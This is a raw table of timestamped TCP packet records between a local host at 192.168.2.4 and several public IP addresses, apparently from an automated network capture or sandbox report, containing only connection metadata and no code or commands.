                                                                                                                          Nov 25, 2024 16:42:35.299164057 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.413722038 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.413810015 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.418116093 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.418181896 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.421405077 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.421478987 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.424283981 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.424374104 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.424387932 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.424436092 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.424457073 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.424516916 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.425510883 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.425539017 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.430166006 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:35.430253029 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.430397034 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:35.430624962 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:35.430659056 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.452368975 CET49761443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:35.452419043 CET44349761172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.452562094 CET49761443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:35.452920914 CET49761443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:35.452934980 CET44349761172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.486042976 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.486099958 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.486120939 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.486162901 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.486174107 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:35.486181974 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.486213923 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:35.486215115 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.486231089 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:35.486243010 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.486258984 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:35.486299992 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:35.505829096 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.505924940 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:35.505939007 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.506023884 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.506072998 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:35.583852053 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.583936930 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.584074020 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.584440947 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.584475040 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.209599018 CET44349758104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.209927082 CET49758443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:36.209949017 CET44349758104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.211093903 CET44349758104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.211416960 CET49758443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:36.211564064 CET49758443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:36.211596012 CET44349758104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.265950918 CET49758443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:36.711919069 CET44349758104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.712091923 CET44349758104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.712194920 CET49758443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:36.713463068 CET49758443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:36.713505983 CET44349758104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.789551020 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.789686918 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:36.789716959 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.789727926 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:36.789735079 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.790123940 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:36.790179968 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.790736914 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.791079998 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:36.791173935 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.791212082 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:36.795803070 CET44349761172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.795999050 CET49761443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:36.796017885 CET44349761172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.799597025 CET44349761172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.799671888 CET49761443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:36.800043106 CET49761443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:36.800059080 CET49761443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:36.800112009 CET49761443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:36.800229073 CET44349761172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.800282955 CET49761443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:36.800400019 CET49764443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:36.800450087 CET44349764172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.800609112 CET49764443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:36.800735950 CET49764443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:36.800757885 CET44349764172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.831356049 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.845489979 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:36.878283978 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.920926094 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:36.929775000 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:36.929794073 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.931436062 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.931866884 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:36.931977034 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.932073116 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:36.932117939 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:36.932193041 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.256939888 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.256994009 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.257033110 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.257050037 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.257065058 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.257105112 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.257121086 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.265196085 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.265259981 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.265284061 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.273719072 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.273772001 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.273791075 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.282382965 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.282443047 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.282455921 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.327085018 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.383778095 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.385952950 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.386106968 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.386173010 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.386214018 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.386320114 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.386379004 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.386394024 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.386533022 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.386584044 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.386598110 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.393954992 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.394027948 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.394047022 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.402445078 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.402517080 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.402532101 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.433855057 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.449126959 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.449146986 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.467205048 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.471330881 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.471390009 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.471409082 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.479562998 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.479608059 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.479620934 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.487565994 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.487672091 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.487684011 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.490056038 CET4972380192.168.2.4199.232.210.172
                                                                                                                          Nov 25, 2024 16:42:37.496244907 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.503971100 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.504043102 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.504055977 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.512134075 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.512192011 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.512203932 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.520400047 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.520454884 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.520466089 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.528615952 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.528661966 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.528673887 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.536853075 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.536900997 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.536923885 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.545089960 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.545160055 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.545172930 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.553324938 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.553369999 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.553381920 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.561625957 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.561674118 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.561686039 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.586683989 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.589229107 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.589297056 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.589358091 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.604185104 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.604257107 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.604290009 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.604319096 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.604372978 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.604839087 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.612327099 CET8049723199.232.210.172192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.612381935 CET4972380192.168.2.4199.232.210.172
                                                                                                                          Nov 25, 2024 16:42:37.612545013 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.620861053 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.620922089 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.620950937 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.629396915 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.629452944 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.629468918 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.637800932 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.637856007 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.637871027 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.646178007 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.646235943 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.646250010 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.654618025 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.654679060 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.654692888 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.671283960 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.671350002 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.671365023 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.678077936 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.679662943 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.679723978 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.679738045 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.681756973 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.681814909 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.681833029 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.693248034 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.693295002 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.693306923 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.701368093 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.701447964 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.701459885 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.716819048 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.716888905 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.716901064 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.716953039 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.724314928 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.724323988 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.724369049 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.729055882 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.729099035 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.730282068 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.738639116 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.738648891 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.738704920 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.743501902 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.743510962 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.743563890 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.752994061 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.753002882 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.753083944 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.762542009 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.762629032 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.767465115 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.767532110 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.777004004 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.777069092 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.786421061 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.786500931 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.788016081 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.790355921 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.790410995 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.790431976 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.795461893 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.795522928 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.795538902 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.800139904 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.800194979 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.800209999 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.801863909 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.801953077 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.804817915 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.804913044 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.804928064 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.814507008 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.814591885 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.814613104 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.814662933 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.823566914 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.823589087 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.823667049 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.823688984 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.823791981 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.829515934 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.829579115 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.832592964 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.832612038 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.832664967 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.836599112 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.836695910 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.841645002 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.841707945 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.841726065 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.841882944 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.846462011 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.846549988 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.855598927 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.855698109 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.864677906 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.864749908 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.873522043 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.873594046 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.878240108 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.878305912 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.896570921 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.896637917 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.902569056 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.902612925 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.906680107 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.906742096 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.906760931 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.906793118 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.906923056 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.906971931 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.906971931 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.907006025 CET44349760104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.907093048 CET49760443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:37.922024965 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.922106028 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.989505053 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.989569902 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:37.994070053 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:37.994136095 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.001173019 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.001245022 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.008058071 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.008141041 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.011431932 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.011502028 CET49763443192.168.2.4104.18.94.41
